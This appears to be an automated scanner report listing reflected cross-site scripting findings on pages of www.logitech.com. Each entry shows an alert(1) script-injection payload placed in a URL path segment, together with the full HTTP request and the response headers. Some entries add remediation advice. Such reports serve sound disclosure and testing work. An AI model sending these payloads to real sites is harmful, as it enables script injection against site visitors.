<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 565b4</script><script>alert(1)</script>d7f7bd3c1db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products565b4</script><script>alert(1)</script>d7f7bd3c1db/cooling-pads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf6ee"><script>alert(1)</script>ecf1f2dd831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-productscf6ee"><script>alert(1)</script>ecf1f2dd831/cooling-pads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a0ee</script><script>alert(1)</script>675e8f8d939 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products/cooling-pads2a0ee</script><script>alert(1)</script>675e8f8d939 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b4ca"><script>alert(1)</script>247da7c2f2a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-products/cooling-pads4b4ca"><script>alert(1)</script>247da7c2f2a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a705b"><script>alert(1)</script>1a16d5452dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usa705b"><script>alert(1)</script>1a16d5452dd/notebook-products/mice HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b2e4</script><script>alert(1)</script>b7d5be44ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3b2e4</script><script>alert(1)</script>b7d5be44ae/notebook-products/mice HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e157d"><script>alert(1)</script>520c8eec5b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-productse157d"><script>alert(1)</script>520c8eec5b2/mice HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7db6c</script><script>alert(1)</script>792950f8312 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products7db6c</script><script>alert(1)</script>792950f8312/mice HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30a0e"><script>alert(1)</script>cb125e3fcf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-products/mice30a0e"><script>alert(1)</script>cb125e3fcf5 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30008</script><script>alert(1)</script>e9bb0bfa58e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products/mice30008</script><script>alert(1)</script>e9bb0bfa58e HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f14fd</script><script>alert(1)</script>3a0ba24b5ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f14fd</script><script>alert(1)</script>3a0ba24b5ae/notebook-products/pc-headsets HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb40"><script>alert(1)</script>3f9125c008e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usdeb40"><script>alert(1)</script>3f9125c008e/notebook-products/pc-headsets HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb81d</script><script>alert(1)</script>2cad224e4db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-productsbb81d</script><script>alert(1)</script>2cad224e4db/pc-headsets HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fae8"><script>alert(1)</script>54025637a82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-products8fae8"><script>alert(1)</script>54025637a82/pc-headsets HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114ee"><script>alert(1)</script>49490d8c7b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-products/pc-headsets114ee"><script>alert(1)</script>49490d8c7b0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27481</script><script>alert(1)</script>99265c333d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products/pc-headsets27481</script><script>alert(1)</script>99265c333d8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 505ed"><script>alert(1)</script>b861cb2b4b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us505ed"><script>alert(1)</script>b861cb2b4b6/notebook-products/speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c369b</script><script>alert(1)</script>5e15b48006e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c369b</script><script>alert(1)</script>5e15b48006e/notebook-products/speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41292</script><script>alert(1)</script>df6ec062374 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products41292</script><script>alert(1)</script>df6ec062374/speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac83a"><script>alert(1)</script>ca94cfb49c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-productsac83a"><script>alert(1)</script>ca94cfb49c3/speakers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6ef7"><script>alert(1)</script>911a5aa7ce1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-products/speakersb6ef7"><script>alert(1)</script>911a5aa7ce1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dba0c</script><script>alert(1)</script>60fcd61bd2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products/speakersdba0c</script><script>alert(1)</script>60fcd61bd2b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 247d1"><script>alert(1)</script>d030e8488cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us247d1"><script>alert(1)</script>d030e8488cf/notebook-products/stands HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e945d</script><script>alert(1)</script>70555e7380b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e945d</script><script>alert(1)</script>70555e7380b/notebook-products/stands HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a72c</script><script>alert(1)</script>6ba199177e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products2a72c</script><script>alert(1)</script>6ba199177e2/stands HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a93a"><script>alert(1)</script>346785c4b21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-products2a93a"><script>alert(1)</script>346785c4b21/stands HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16893"><script>alert(1)</script>448d23324d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-products/stands16893"><script>alert(1)</script>448d23324d6 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 844f9</script><script>alert(1)</script>1659ab47d48 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-products/stands844f9</script><script>alert(1)</script>1659ab47d48 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 352e8"><script>alert(1)</script>19c7f77259d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us352e8"><script>alert(1)</script>19c7f77259d/notebook-products/webcams HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:06 GMT Connection: close
